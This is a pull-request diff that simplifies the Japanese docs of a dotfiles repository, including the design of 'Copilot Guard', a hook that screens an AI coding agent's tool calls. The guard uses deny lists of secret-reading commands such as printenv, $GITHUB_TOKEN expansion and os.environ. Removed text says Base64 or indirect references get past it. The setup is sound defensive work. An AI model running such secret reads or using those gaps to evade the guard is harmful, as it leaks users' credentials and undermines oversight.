### PR TITLE
docs: README と補助ドキュメントを簡素化

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,31 +2,29 @@
 
 Cross-platform dotfiles managed by [chezmoi](https://www.chezmoi.io/) + [mise](https://mise.jdx.dev/).
 
-このリポジトリは、Linux / macOS / WSL / Windows / Codespaces / Dev Container で、同じ運用感と安全なデフォルトを維持するための dotfiles である。`chezmoi` で設定ファイルをテンプレート管理し、`mise` で開発ツールのバージョンをそろえ、OS ごとの差分は最小限の分岐に閉じ込めている。コーディングエージェント向けの共通化は、GitHub Copilot CLI を前提にカスタム指示、フック、スキルを整備している。
+Linux / macOS / WSL / Windows / Codespaces / Dev Container で、できるだけ同じ運用感を保つための dotfiles である。設定ファイルは `chezmoi` で管理し、開発ツールのバージョンは `mise` でそろえ、GitHub Copilot CLI 向けの指示・フック・スキルも同じリポジトリで管理する。
 
-## 特徴と価値
+## このリポジトリが扱うもの
 
-- **1つのソースで複数環境を管理**: `chezmoi` のテンプレートで、プラットフォームごとの差分を吸収しながら設定を一元管理している
-- **ツールチェーンを再現しやすい**: `mise` と lockfile で、開発ツールのバージョンと取得元をそろえやすい構成である
-- **GitHub Copilot CLI 向け設定を共通化**: カスタム指示、フック、スキルを dotfiles として管理している
-- **安全なデフォルト**: `gitleaks` を組み込んだ `git pre-commit` フックと Copilot CLI の `preToolUse` フックにより、コミット前とエージェント実行時のガードをそろえている。エージェント向けフックは秘匿ファイルへのアクセスを自動拒否（`blocked-files.txt`）または確認付きアクセス（`ask-files.txt`）に振り分け、環境変数の読み取りや許可外 URL への送信も自動拒否する。さらに `postToolUse` フックによる監査ログと、Autopilot モード向けの `copilot-safe` エイリアスで多層防御を構成している（[詳細](docs/copilot-cli.md#セキュリティフック)）
-- **制約の多いコンテナ環境でも破綻しにくい**: 非対話での作成やホスト側ツールにアクセスできないケースを考慮し、必要な分岐やフォールバックを組み込んでいる
+- **設定ファイルの配布**: `chezmoi` テンプレートで OS ごとの差分を吸収する
+- **ツールバージョンの固定**: `mise` と lockfile で取得元と版をそろえる
+- **Copilot CLI の共通設定**: カスタム指示、フック、スキルを管理する
+- **安全寄りの既定値**: `gitleaks` の pre-commit フックと Copilot Guard を組み込む
+
+詳細は [`docs/architecture.md`](docs/architecture.md) と [`docs/copilot-cli.md`](docs/copilot-cli.md) を参照。
 
 ## 対応環境
 
-| 環境 | セットアップ | 注意点 |
-|------|------------|--------|
-| Linux / macOS | [クイックスタート → Linux / macOS / WSL](#linux--macos--wsl) | — |
-| WSL | [クイックスタート → Linux / macOS / WSL](#linux--macos--wsl) | 1Password パスが Windows 側、初回 `windowsUser` 入力が必要 |
-| GitHub Codespaces | [クイックスタート → GitHub Codespaces](#github-codespaces) | `corpUser` 未設定 |
-| Dev Container (ローカル) | [クイックスタート → Dev Container](#dev-container-ローカル) | 初回 `mise install --yes` を手動実行 |
-| Windows | [クイックスタート → Windows](#windows) | `copilot` は DSC + winget で導入 |
+| 環境 | セットアップ | 補足 |
+|------|------------|------|
+| Linux / macOS / WSL | [Linux / macOS / WSL](#linux--macos--wsl) | WSL は初回 `windowsUser` 入力が必要 |
+| GitHub Codespaces | [GitHub Codespaces](#github-codespaces) | 非対話セットアップのため一部設定を省略 |
+| Dev Container (ローカル) | [Dev Container](#dev-container-ローカル) | `mise install --yes` は起動後に手動実行 |
+| Windows | [Windows](#windows) | `copilot` は DSC + winget で導入 |
 
 ## クイックスタート
 
 ### Linux / macOS / WSL
-
-以下の例では `~/dotfiles` に clone しているが、clone 先は任意でよい。`install.sh` は検証済みの `chezmoi` リリースを展開した後、`chezmoi init --apply` でリポジトリを chezmoi のソースディレクトリ（`~/.local/share/chezmoi`）へ改めて clone し、設定ファイルをホームに配置する。最初の clone は `install.sh` を取得するためだけに使う。
 
 ```bash
 git clone https://github.com/torumakabe/dotfiles.git ~/dotfiles
@@ -34,56 +32,47 @@ cd ~/dotfiles
 ./install.sh
 ```
 
-初回実行時にプラットフォーム検出と変数の入力プロンプトが表示される。
+初回実行時に次を聞かれる。
 
-- **Windows username** (WSL のみ): 1Password の WSL 連携パスに使用
-- **Corp username** (任意): 所属企業での Git ユーザー名。gitconfig に使用
+- **Windows username**: WSL のみ。1Password の WSL 連携パスに使う
+- **Corp username**: 任意。企業用 Git 設定に使う
 
-`mise install` がレート制限で失敗した場合は、[`docs/operations.md` の `mise` セクション](docs/operations.md#mise-と-github-api)を参照してリトライする。
+`mise install` がレート制限で失敗した場合は [`docs/operations.md`](docs/operations.md#mise-の保守) を参照。
 
 ### GitHub Codespaces
 
-自動適用される。GitHub の設定で dotfiles リポジトリとして登録するだけでよい。
+GitHub の dotfiles リポジトリに登録すると自動適用される。
+
+- `corpUser` / `windowsUser` の入力は省略される
+- 1Password SSH エージェントが使えないため、コミット署名は自動で無効化する
 
 参考: [Codespaces docs](https://docs.github.com/en/codespaces/setting-your-user-preferences/personalizing-github-codespaces-for-your-account#dotfiles)
 
-制限事項:
-
-- 非対話での作成のため `corpUser` / `windowsUser` のプロンプトはスキップされ、空文字になる（`.gitconfig-corp` は適用されない）
-- コミット署名（`commit.gpgsign`）は自動で無効化される（1Password SSH エージェントが利用できないため）
-
-Codespaces では GitHub の [GPG verification](https://docs.github.com/en/codespaces/managing-your-codespaces/managing-gpg-verification-for-github-codespaces) を有効にすることで、GitHub 管理の鍵による署名が可能である。
-
 ### Dev Container (ローカル)
 
-任意のリポジトリの Dev Container で dotfiles を適用するケースである。VS Code の設定で dotfiles リポジトリを指定すると、コンテナ作成時に `install.sh` が自動実行される。
+VS Code の **Dotfiles** 設定で次を指定する。
 
-参考: [Personalizing with dotfile repositories](https://code.visualstudio.com/docs/devcontainers/containers#_personalizing-with-dotfile-repositories)
+- **Repository**: `torumakabe/dotfiles`
+- **Install Command**: `install.sh`
 
-1. VS Code の Settings → **Dotfiles** で以下を設定:
-   - **Repository**: `torumakabe/dotfiles`
-   - **Install Command**: `install.sh`
-2. Dev Container を作成すると `install.sh` → `chezmoi init --apply` が自動実行される
-3. コンテナ起動後にターミナルから手動で実行:
+コンテナ起動後に手動で実行する。
 
 ```bash
 gh auth login
 GITHUB_TOKEN=$(gh auth token) mise install --yes
 ```
 
-制限事項:
-
-- `mise install` はコンテナ作成時にスキップされる。コンテナ起動後に手動実行する
-- Docker, Go tools, draw.io などの追加ツール導入はスキップされる。必要ならベースイメージまたは Dev Container Feature 側で補う
-- 非対話での作成のため `corpUser` / `windowsUser` は空文字になる
-- コミット署名（`commit.gpgsign`）は自動で無効化される（1Password SSH エージェントが利用できないため）
+`mise install` は作成時にはスキップする。追加の注意点は [`docs/troubleshooting.md`](docs/troubleshooting.md#dev-container-で-mise-ツールが入っていない) を参照。
 
 ### Windows
 
-1. chezmoi インストール: `winget install twpayne.chezmoi`
-2. 設定適用: `chezmoi init --apply torumakabe`
-3. Windows セットアップ (DSC): `winget configure -f "$(chezmoi source-path)\..\reference\windows\configuration.dsc.yaml"`
-4. PowerShell Profile のローダー設定（初回のみ）:
+```powershell
+winget install twpayne.chezmoi
+chezmoi init --apply torumakabe
+winget configure -f "$(chezmoi source-path)\..\reference\windows\configuration.dsc.yaml"
+```
+
+PowerShell Profile のローダー設定が未追加なら、初回のみ以下を実行する。
 
 ```powershell
 if (!(Test-Path $PROFILE)) { New-Item -Path $PROFILE -Type File -Force }
@@ -93,68 +82,31 @@ if (!(Select-String -Path $PROFILE -SimpleMatch $line -Quiet)) {
 }
 ```
 
-5. 残りのツールを mise でインストール:
+残りのツールは `mise` で導入する。
 
 ```powershell
 gh auth login
 $env:GITHUB_TOKEN = (gh auth token); mise install; $env:GITHUB_TOKEN = $null
 ```
 
-`copilot` は step 3 の `winget configure` で導入されるため、Windows では `mise install` の対象外である。
+`copilot` は DSC 側で導入するため、Windows では `mise` の対象外である。
 
 ## 日常操作
 
-### 何をどこで管理するか
-
-| 分類 | 例 | 編集方法 |
-|------|----|----------|
-| **chezmoi 管理** | `.gitconfig`, `.zshrc`, `.config/mise/config.toml`, `.copilot/` | `chezmoi edit` でソースを編集 → `chezmoi apply` |
-| **mise 管理** | Go, Node, Terraform などのバージョン | `.config/mise/config.toml` を更新 → `mise install` |
-| **手動管理** | `reference/windows/` 配下 | 直接編集して git commit |
-| **リポジトリメタ情報** | `README.md`, `.github/copilot-instructions.md` | 直接編集して git commit |
-
-`copilot` は例外で、Linux / WSL / Codespaces / Dev Container では `mise`、macOS では `brew`、Windows では `winget` で管理する。
-
-**重要**: chezmoi 管理下のファイルを直接編集しても、次回の `chezmoi apply` で上書きされる。永続化するには `chezmoi edit` またはソース側の編集を使う。
-
-### よく使うコマンド
-
-| やりたいこと | コマンド |
-|--------------|----------|
-| 設定ファイルを編集 | `chezmoi edit ~/.zshrc` |
-| 変更を反映 | `chezmoi apply` |
-| 適用前の差分を見る | `chezmoi diff` |
-| 生成結果を確認 | `chezmoi cat ~/.gitconfig` |
-| リモートの変更を取り込む | `chezmoi update` |
-| mise 管理ツールをまとめて更新 | `mise-upgrade` |
-
-### 典型的な作業フロー
-
-設定を変えるとき:
+`chezmoi` 管理下のファイルはホーム側を直接編集せず、`chezmoi edit` かソース側の編集を使う。
 
 ```bash
 chezmoi edit ~/.zshrc
 chezmoi diff
 chezmoi apply
-```
-
-リモートの変更を反映するとき:
-
-```bash
 chezmoi update
 ```
 
-`mise` 管理ツールを更新するとき:
-
-```bash
-mise-upgrade
-```
-
-`mise-upgrade` は `gh auth token` の一時取得、`mise upgrade`、`mise lock --global --platform`、`chezmoi re-add`、git commit + push までをまとめて実行するシェル関数である。詳細な手順や例外系は [`docs/operations.md`](docs/operations.md) を参照する。
+`mise` 管理ツールの更新や lockfile 再生成は [`docs/operations.md`](docs/operations.md) を参照。
 
 ## 詳細ドキュメント
 
-- [`docs/operations.md`](docs/operations.md): 運用詳細、`mise` の追加・削除、lockfile 再構築、`git pre-commit` フックの追加・更新、`run_once_*` の扱い
-- [`docs/architecture.md`](docs/architecture.md): ディレクトリ構造、主要な設計判断、`git pre-commit` フックの構造、プラットフォーム検出、Git `includeIf` 設計
-- [`docs/copilot-cli.md`](docs/copilot-cli.md): Copilot CLI の管理対象ファイル、プラグイン、スキル、セキュリティフック、Autopilot 安全利用、監査ログ
-- [`docs/troubleshooting.md`](docs/troubleshooting.md): よくあるエラーと復旧手順
+- [`docs/operations.md`](docs/operations.md): `mise` の更新、lockfile 再生成、pre-commit フック管理、`run_once_*` の再実行
+- [`docs/architecture.md`](docs/architecture.md): ディレクトリ構造、設計判断、プラットフォーム分岐、Copilot Guard の構成
+- [`docs/copilot-cli.md`](docs/copilot-cli.md): Copilot CLI の管理対象、フック、`copilot-safe`、監査ログ
+- [`docs/troubleshooting.md`](docs/troubleshooting.md): よくある失敗と復旧手順

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -1,177 +1,136 @@
 # Architecture Guide
 
-README から分離した、構成と設計判断の詳細である。
+README から分離した、構成と設計判断の詳細である。運用手順は [`docs/operations.md`](operations.md) を参照。
 
 ## ディレクトリ構造
 
 ```text
-home/                          ← chezmoi source (.chezmoiroot で指定)
-├── .chezmoi.toml.tmpl         ← 共通 platform flag・変数定義
-├── .chezmoiignore             ← 共通 flag を使ってファイルをスキップ
-├── .chezmoiremove             ← レガシーファイル自動削除
-├── dot_gitconfig.tmpl         ← ベース gitconfig (includeIf で分岐)
-├── dot_gitconfig-linux.tmpl   ← Linux/WSL 共通 (内部で WSL 分岐)
-├── dot_gitconfig-mac.tmpl     ← macOS 用
-├── dot_gitconfig-windows.tmpl ← Windows 用
-├── dot_gitconfig-corp.tmpl    ← 所属企業リポジトリ用
-├── dot_zshrc.tmpl             ← シェル設定
+home/                           ← chezmoi source (.chezmoiroot で指定)
+├── .chezmoi.toml.tmpl          ← 共通 flag・変数定義
+├── .chezmoiignore              ← 条件付き除外
+├── .chezmoiremove              ← 不要ファイルの削除
+├── dot_gitconfig*.tmpl         ← Git 設定
+├── dot_zshrc.tmpl              ← zsh 設定
 ├── dot_config/
-│   ├── git/
-│   │   └── hooks/
-│   │       └── pre-commit     ← gitleaks + ローカルフック委譲のグローバル pre-commit
+│   ├── git/hooks/pre-commit    ← gitleaks + ローカルフック委譲
 │   └── mise/
-│       ├── config.toml.tmpl   ← mise ツールバージョン定義
-│       └── mise.lock          ← mise lockfile (mise lock で生成)
-├── PowerShell_profile.ps1.tmpl ← Windows PowerShell Profile (mise activate 含む)
-├── private_dot_copilot/       ← ~/.copilot/ に配置
+│       ├── config.toml.tmpl    ← ツール定義
+│       └── mise.lock           ← lockfile
+├── PowerShell_profile.ps1.tmpl ← PowerShell 設定
+├── private_dot_copilot/        ← ~/.copilot/ に配置
 │   ├── copilot-instructions.md
-│   ├── mcp-config.json        ← MCP サーバー設定 (/mcp add 後は re-add)
+│   ├── mcp-config.json
 │   ├── hooks/
-│   │   ├── hooks.json         ← preToolUse / postToolUse フック定義
-│   │   ├── blocked-files.txt  ← ブロックパターン (deny)
-│   │   ├── ask-files.txt      ← 確認付きアクセスパターン (ask)
-│   │   ├── allowed-urls.txt   ← URL 許可リスト
+│   │   ├── hooks.json
+│   │   ├── blocked-files.txt
+│   │   ├── ask-files.txt
+│   │   ├── allowed-urls.txt
 │   │   └── scripts/
-│   │       ├── copilot-guard.py
-│   │       ├── uv-enforcer.py
-│   │       └── audit-log.py
 │   └── skills/
-├── run_once_before_*          ← パッケージ・mise インストール
-└── run_once_after_*           ← シェル・ツールセットアップ
-reference/windows/             ← デプロイしない参照ファイル
-├── configuration.dsc.yaml     ← WinGet DSC (手動実行)
-└── winterm-settings.json      ← Windows Terminal テーマ
-.github/
-└── copilot-instructions.md    ← リポジトリレベル Copilot 指示
+├── run_once_before_*           ← パッケージ・mise 自体の導入
+└── run_once_after_*            ← shell・追加ツールの設定
+reference/windows/              ← 参照専用ファイル
+└── configuration.dsc.yaml      ← WinGet DSC
 ```
 
-`.chezmoiremove` は `chezmoi apply` 時にホームディレクトリから不要になったファイルを自動削除する。現在は `~/.mise.toml` を対象としている。
+`.chezmoiremove` は `chezmoi apply` 時に不要ファイルを自動削除する。現在は `~/.mise.toml` が対象。
 
 ## 主要な決定事項
 
-- **chezmoi** が設定ファイルの配置・テンプレート化・プラットフォーム分岐を担当
-- **mise** が全プラットフォームでツールバージョンを管理
-- **uv** が Python 実行を管理し、システム Python 依存を減らす
-- **Git includeIf** を使って、プラットフォーム別 gitconfig の差分だけを自動読込する
-- **コミット署名** は 1Password SSH エージェント経由を基本とし、コンテナ系環境では自動無効化する
-- **Copilot Guard / uv Enforcer** により、危険なファイルアクセスや Python / pip の直接実行を抑止する
-- **postToolUse 監査ログ** により、ツール実行履歴を `~/.copilot/audit.jsonl` に記録し、事後検証を可能にする
-- **`copilot-safe` エイリアス** により、Autopilot モードでの多層防御（`--deny-tool` によるネットワークコマンド・リモート転送・DNS ルックアップのブロック、`--secret-env-vars` による機微変数隠蔽、ステップ数上限）を固定化する
-- **gitleaks + git pre-commit** により、コミット前に secret scan を走らせつつ、各リポジトリ固有のフックも併用できる
-- **Codespaces / Dev Container** では、非対話での作成や認証制約に合わせたワークアラウンドとフォールバックを持つ
+- **設定の配布** は `chezmoi`
+- **ツール版管理** は `mise`
+- **Python 実行** は `uv`
+- **Git 差分の分岐** は `includeIf`
+- **コミット署名** は 1Password SSH エージェントを基本にし、コンテナ系環境では自動無効化
+- **Copilot Guard / uv Enforcer** で危険な操作を抑止
+- **postToolUse 監査ログ** で事後確認を可能にする
+- **`copilot-safe`** で Autopilot の既定値を安全寄りに固定する
+- **gitleaks 付き pre-commit** で共通の secret scan を配布する
 
 ## Copilot Guard の設計
 
-`copilot-guard.py` は `preToolUse` フックとして、エージェントのツール呼び出しを**実行前にテキスト検査**し、以下の判定を行う。
+`copilot-guard.py` は `preToolUse` フックとして、ツール呼び出しを実行前に検査する。
 
-1. **秘匿ファイルへのアクセス拒否** — `.env`、`*.pem`、認証トークンファイル等（`blocked-files.txt` で定義）
-2. **確認付きアクセス (ask)** — Copilot Hook 設定、Terraform パラメータ等（`ask-files.txt` で定義）。ユーザーの明示的な承認が必要
-3. **環境変数からの秘匿情報読み取り拒否** — `printenv`、`$GITHUB_TOKEN` 展開、`os.environ` 等
-4. **許可外 URL への送信拒否** — `allowed-urls.txt` に含まれないドメインへのリクエスト
+### 役割
 
-判定の優先度は deny > ask > allow であり、複数のチェック層が異なる判定を返した場合は最も制限的な判定が採用される。
+1. **秘匿ファイルへのアクセス拒否** — `blocked-files.txt`
+2. **確認付きアクセス** — `ask-files.txt`
+3. **機微な環境変数読み取りの拒否** — `printenv`, `$TOKEN`, `os.environ` など
+4. **許可外 URL の拒否** — `allowed-urls.txt`
 
-### 設計上の位置づけ
+判定優先度は **deny > ask > allow**。
 
-このフックは**エージェント向けのガードレール**であり、上記の操作をコマンド文字列のパターンマッチで検出する。LLM エージェントは通常、最も自然なコード（`printenv`、`echo $SECRET`、`os.environ` 等）を生成するため、そのパターンをブロックするだけで大部分のリスクをカバーできる。Base64 エンコードや変数間接参照などの難読化には対応しないが、プロンプトインジェクション等の悪意ある介入がない限り、エージェントがそのようなコードを生成する可能性は低い。`blocked-files.txt` によるファイルブロックも同様に、テキストベースの検査で実用上十分なカバー範囲を得る設計である。
+### パス判定
+
+パス比較前に `\` を `/` へ正規化する。パターンファイルは `/` 前提で書く。
 
 ### チェック層
 
 ```text
-preToolUse 入力 (JSON)
-  │
-  ├─ 1. ファイルアクセスチェック ← blocked-files.txt / ask-files.txt
-  │     対象: 全ツールの path/file/uri/glob/command 引数
-  │     判定: blocked → deny, ask → ask (ユーザー確認)
-  │
-  ├─ 2. 環境変数アクセスチェック ← コード内定義
-  │     対象: bash/powershell の command 引数のみ
-  │     - 列挙コマンド (printenv, env, declare -p, ...)
-  │     - 秘匿変数展開 ($SECRET, $TOKEN, ...)
-  │     - ランタイム全体ダンプ (os.environ, process.env, ...)
-  │     ※ 汎用変数 ($PATH, $HOME, ...) は許可リストで除外
-  │
-  └─ 3. URL 許可リストチェック ← allowed-urls.txt
-        対象: command 内の URL、web_fetch の url 引数
+preToolUse 入力
+  ├─ ファイルアクセスチェック
+  ├─ 環境変数アクセスチェック
+  └─ URL 許可リストチェック
 ```
 
-### 環境変数の許可リスト設計
-
-環境変数チェックでは `$VAR` / `${VAR}` 展開を検査するが、全変数をブロックするとエージェントの通常作業が阻害される。そこで以下のルールで判定する:
-
-1. 変数名が許可リスト（`PATH`、`HOME`、`SHELL`、`SSH_AUTH_SOCK` 等 50 以上）に含まれれば**常に許可**
-2. 変数名に秘匿フラグメント（`secret`、`token`、`key`、`password`、`credential`、`auth` 等）が含まれれば**ブロック**
-3. 上記のいずれにも該当しない変数は**許可**（未知の変数はブロックしない）
-
-この設計は「偽陽性（正当な操作のブロック）を最小化し、明らかに危険なパターンだけを止める」方針に基づく。
+環境変数チェックは「明らかに危険な列挙や展開を止める」方針で、通常作業でよく使う変数は許可リストで除外する。
 
 ## git pre-commit フック
 
-グローバル `pre-commit` フックは `home/dot_config/git/hooks/executable_pre-commit` から `~/.config/git/hooks/pre-commit` に配置され、`~/.gitconfig` の `core.hooksPath` で有効化される構成である。
+グローバル `pre-commit` フックは `~/.config/git/hooks/pre-commit` に配置し、`core.hooksPath` で有効化する。
 
-このフックは次の 2 段構えで動作する。
+処理は次の 2 段構えである。
 
-1. `gitleaks git --pre-commit --staged --redact --verbose --no-banner` で staged 変更を検査する
-2. 各リポジトリに `.git/hooks/pre-commit` が存在すれば、それを追加で呼び出す
+1. `gitleaks git --pre-commit --staged --redact --verbose --no-banner`
+2. 各リポジトリの `.git/hooks/pre-commit` があれば追加で実行
 
-これにより、dotfiles 側で共通の secret scan を強制しつつ、各リポジトリ固有のフック実装も失わない構成になっている。
+これにより、共通の secret scan を強制しつつローカルフックも共存できる。
 
 ## プラットフォーム検出
 
 | 変数名 | 説明 |
 |--------|------|
-| `.chezmoi.os` | chezmoi 組み込みの OS 値 (`linux`, `darwin`, `windows`) |
-| `.isLinux` / `.isMac` / `.isWindows` | `.chezmoi.os` から導出した共通 flag |
-| `.isWSL` | Linux 上で `kernel.osrelease` に `microsoft` を含む場合に true |
+| `.chezmoi.os` | `linux`, `darwin`, `windows` |
+| `.isLinux` / `.isMac` / `.isWindows` | `.chezmoi.os` から導出 |
+| `.isWSL` | Linux かつ `kernel.osrelease` に `microsoft` を含む |
 | `.codespaces` | GitHub Codespaces |
 | `.devcontainer` | Dev Container |
 | `.windowsUser` | Windows ユーザー名 |
-| `.corpUser` | 所属企業での Git ユーザー名 |
+| `.corpUser` | 企業用 Git ユーザー名 |
 
-## Git `includeIf` の設計
+## Git `includeIf`
 
-`home/dot_gitconfig.tmpl` ではベース設定を `~/.gitconfig` に集約し、`includeIf` でプラットフォーム別の差分だけを読み込む。
+`home/dot_gitconfig.tmpl` ではベース設定を `~/.gitconfig` に置き、プラットフォーム差分だけを `includeIf` で切り替える。
 
-- `gitdir:/home/` → Linux / WSL のリポジトリ
-- `gitdir:/Users/` → macOS のリポジトリ
-- `gitdir/i:C:/`, `gitdir/i:D:/` → Windows のリポジトリ
+- `gitdir:/home/` → Linux / WSL
+- `gitdir:/Users/` → macOS
+- `gitdir/i:C:/`, `gitdir/i:D:/` → Windows
 
-補足:
-
-- `gitdir` はリポジトリの `.git` ディレクトリのパス接頭辞で判定される
-- Windows では drive letter の大文字小文字差を吸収するため `gitdir/i:` を使う
-- WSL はパス判定上は Linux (`/home/`) なので `~/.gitconfig-linux` を読み込み、その中で `.isWSL` を使って 1Password 連携パスだけを切り替える
-- template の制御構文は `{{- ... -}}` で前後の余分な空行を抑える
+WSL は Linux 側の設定を読みつつ、内部で `.isWSL` を使って 1Password 連携パスだけを切り替える。
 
 ## コミット署名
 
-1Password の SSH エージェントを使った SSH 署名をデフォルトで有効化している（`commit.gpgsign = true`, `gpg.format = ssh`）。`gpg.ssh.program` はプラットフォームごとに切り替える。
+1Password の SSH エージェントによる SSH 署名を既定で有効化している。
 
-| 環境 | `gpg.ssh.program` | ソース |
-|------|-------------------|--------|
-| macOS | `/Applications/1Password.app/Contents/MacOS/op-ssh-sign` | `dot_gitconfig-mac.tmpl` |
-| Linux | `/opt/1Password/op-ssh-sign` | `dot_gitconfig-linux.tmpl` |
-| WSL | `/mnt/c/Users/<windowsUser>/.../op-ssh-sign-wsl.exe` | `dot_gitconfig-linux.tmpl` |
-| Windows | `C:/Users/<windowsUser>/.../op-ssh-sign.exe` | `dot_gitconfig-windows.tmpl` |
+| 環境 | `gpg.ssh.program` |
+|------|-------------------|
+| macOS | `/Applications/1Password.app/Contents/MacOS/op-ssh-sign` |
+| Linux | `/opt/1Password/op-ssh-sign` |
+| WSL | `/mnt/c/Users/<windowsUser>/.../op-ssh-sign-wsl.exe` |
+| Windows | `C:/Users/<windowsUser>/.../op-ssh-sign.exe` |
 
-Dev Container / Codespaces では 1Password SSH エージェントがコンテナ内に転送されないため、chezmoi テンプレートで `commit.gpgsign = false` に自動切替する。Codespaces では GitHub の [GPG verification](https://docs.github.com/en/codespaces/managing-your-codespaces/managing-gpg-verification-for-github-codespaces) を有効にすることで、GitHub 管理の鍵による署名が可能である。
+Dev Container / Codespaces では 1Password SSH エージェントを前提にできないため、`commit.gpgsign = false` に切り替える。
 
-## `run_once_` スクリプトの実行順と依存関係
+## `run_once_*` スクリプトの実行順と依存関係
 
-chezmoi は `run_once_before_*` → 通常のファイル適用 → `run_once_after_*` の順に処理する。さらに同じフェーズ内ではファイル名の数字順で実行される。
+chezmoi は `run_once_before_*` → 通常ファイル適用 → `run_once_after_*` の順に処理し、同じフェーズ内では数字順で実行する。
 
-| 順序 | スクリプト | 役割 | 後続が依存している前提 |
-|------|-----------|------|------------------------|
-| 1 | `run_once_before_10-install-packages.sh` | OS パッケージを導入 | `git` / `zsh` が後続の shell setup と mise bootstrap までに使える |
-| 2 | `run_once_before_20-install-mise.sh` | `mise` 自体を導入 | `run_once_after_20-mise-install.sh` 開始時点で `mise` コマンドが存在する |
-| 3 | `run_once_after_10-setup-shell.sh` | Oh My Zsh / plugin / default shell を設定 | `git` / `zsh` は 1 で導入済み |
-| 4 | `run_once_after_20-mise-install.sh` | `~/.config/mise/config.toml` と `mise.lock` を使ってツール本体を導入 | chezmoi による dotfiles 配置完了後に実行される |
-| 5 | `run_once_after_30-install-tools.sh` | Docker, Go tools, GUI アプリなどの追加導入 | `mise install` 済みで `go` などのコマンドが PATH に存在する |
+| 順序 | スクリプト | 役割 | 依存前提 |
+|------|-----------|------|----------|
+| 1 | `run_once_before_10-install-packages.sh` | OS パッケージ導入 | 後続で `git` / `zsh` を使える |
+| 2 | `run_once_before_20-install-mise.sh` | `mise` 自体を導入 | 後続で `mise` が存在する |
+| 3 | `run_once_after_10-setup-shell.sh` | shell 設定 | `git` / `zsh` は導入済み |
+| 4 | `run_once_after_20-mise-install.sh` | `config.toml` / `mise.lock` を使ってツール導入 | dotfiles 配置後に動く |
+| 5 | `run_once_after_30-install-tools.sh` | 追加ツール導入 | `mise install` 済み |
 
-### 変更時の確認事項
-
-- `before_` / `after_` の跨ぎを変えても、`mise` 設定ファイルや lockfile が生成される前に `mise install` しないこと
-- `run_once_before_10-install-packages.sh` のパッケージ変更で、後続の前提を壊していないこと
-- `run_once_after_10-setup-shell.sh` は非対話実行でも失敗しないこと
-- `run_once_after_20-mise-install.sh` の retry / workaround を変える場合、Codespaces とローカル Dev Container の分岐を壊していないこと
-- `run_once_after_30-install-tools.sh` の skip 条件を変える場合、Codespaces / Dev Container では引き続きベースイメージや Features 側で補う前提か確認すること
+変更時は、`mise` 設定が配置される前に `mise install` しないことと、Codespaces / Dev Container の分岐を壊さないことを優先して確認する。

--- a/docs/copilot-cli.md
+++ b/docs/copilot-cli.md
@@ -1,32 +1,24 @@
 # GitHub Copilot CLI Guide
 
-GitHub Copilot CLI の設定・運用ガイドである。chezmoi が `~/.copilot/` 配下のカスタム指示、フック、スキルを管理する。プラグインは Copilot CLI のプラグインマネージャが管理するため chezmoi の対象外である。
+この repo では `~/.copilot/` 配下のうち、**自分で維持したい設定だけ** を chezmoi で管理する。Copilot CLI 自体の一般的な使い方や `/plugin` の詳細は公式ドキュメントを参照。
 
-このガイドでは以下を扱う。
+## 管理境界
 
-- **管理対象ファイル**: chezmoi で管理するファイルと管理外のファイルの一覧
-- **プラグイン / スキル**: 追加・更新の手順
-- **セキュリティフック**: 設定のカスタマイズとテスト方法（設計の詳細は [`docs/architecture.md`](architecture.md#copilot-guard-の設計) を参照）
-
-## 管理対象ファイル
-
-| ファイル | 用途 | 管理方法 |
-|---------|------|----------|
+| パス | 用途 | 管理方法 |
+|------|------|----------|
 | `copilot-instructions.md` | ユーザーレベルのカスタム指示 | chezmoi |
-| `mcp-config.json` | MCP サーバー設定 | chezmoi（`/mcp add` 後は `re-add`） |
-| `hooks/hooks.json` | preToolUse / postToolUse フック定義 | chezmoi |
-| `hooks/scripts/copilot-guard.py` | セキュリティガード（ファイル・URL・環境変数） | chezmoi |
-| `hooks/scripts/uv-enforcer.py` | Python / pip 直接実行をブロック | chezmoi |
-| `hooks/scripts/audit-log.py` | ツール実行の監査ログ記録 | chezmoi |
-| `hooks/blocked-files.txt` | ブロック対象ファイルパターン (deny) | chezmoi |
-| `hooks/ask-files.txt` | 確認付きアクセスパターン (ask) | chezmoi |
+| `mcp-config.json` | MCP サーバー設定 | chezmoi (`/mcp add` 後は `chezmoi re-add`) |
+| `hooks/hooks.json` | `preToolUse` / `postToolUse` 設定 | chezmoi |
+| `hooks/scripts/copilot-guard.py` | ファイル・URL・環境変数アクセスのガード | chezmoi |
+| `hooks/scripts/uv-enforcer.py` | `python` / `pip` 直接実行の抑止 | chezmoi |
+| `hooks/scripts/audit-log.py` | ツール実行ログの記録 | chezmoi |
+| `hooks/blocked-files.txt` | deny パターン | chezmoi |
+| `hooks/ask-files.txt` | ask パターン | chezmoi |
 | `hooks/allowed-urls.txt` | URL 許可リスト | chezmoi |
-| `skills/` | エージェントスキル | chezmoi（上流更新時は `re-add`） |
-| `installed-plugins/` | プラグイン | `/plugin install` で管理 |
+| `skills/` | ユーザーレベルのスキル | chezmoi |
+| `installed-plugins/` | プラグイン | Copilot CLI 側で管理 |
 
 ## CLI 本体の導入元
-
-`copilot` CLI の本体は、プラットフォームごとに導入元を分けている。
 
 | 環境 | 導入元 |
 |------|--------|
@@ -34,31 +26,14 @@ GitHub Copilot CLI の設定・運用ガイドである。chezmoi が `~/.copilo
 | macOS | `brew` |
 | Windows | `winget` (`reference/windows/configuration.dsc.yaml`) |
 
-macOS では Copilot Desktop が GUI プロセスとして起動するため、`.zshrc` から `launchctl setenv COPILOT_CLI_PATH` を設定して Homebrew 側の `copilot` パスを公開する。
+macOS では Copilot Desktop からも参照できるよう、`.zshrc` で `COPILOT_CLI_PATH` を公開する。
 
-## プラグインの管理
+## プラグインとスキル
 
-プラグインは `/plugin` コマンドで管理する。chezmoi の管理外である。
+- **プラグイン**: `/plugin` コマンドで管理する。chezmoi の管理外
+- **スキル**: `~/.copilot/skills/` を chezmoi で管理する
 
-```text
-/plugin marketplace add <publisher>/<plugin>
-/plugin install <name>@<plugin>
-/plugin update <name>@<plugin>
-```
-
-例: [Azure Skills Plugin](https://github.com/microsoft/azure-skills)
-
-```text
-/plugin marketplace add microsoft/azure-skills
-/plugin install azure@azure-skills
-/plugin update azure@azure-skills
-```
-
-> **注意**: Azure Skills Plugin は Node.js 18+、Azure CLI (`az login`)、Azure Developer CLI (`azd auth login`) が前提である。他のプラグインの前提条件は各プラグインのドキュメントを参照する。
-
-## スキルの管理
-
-ユーザーレベルのスキル（`~/.copilot/skills/`）は chezmoi で管理する。
+スキル追加後はソースへ戻す。
 
 ```bash
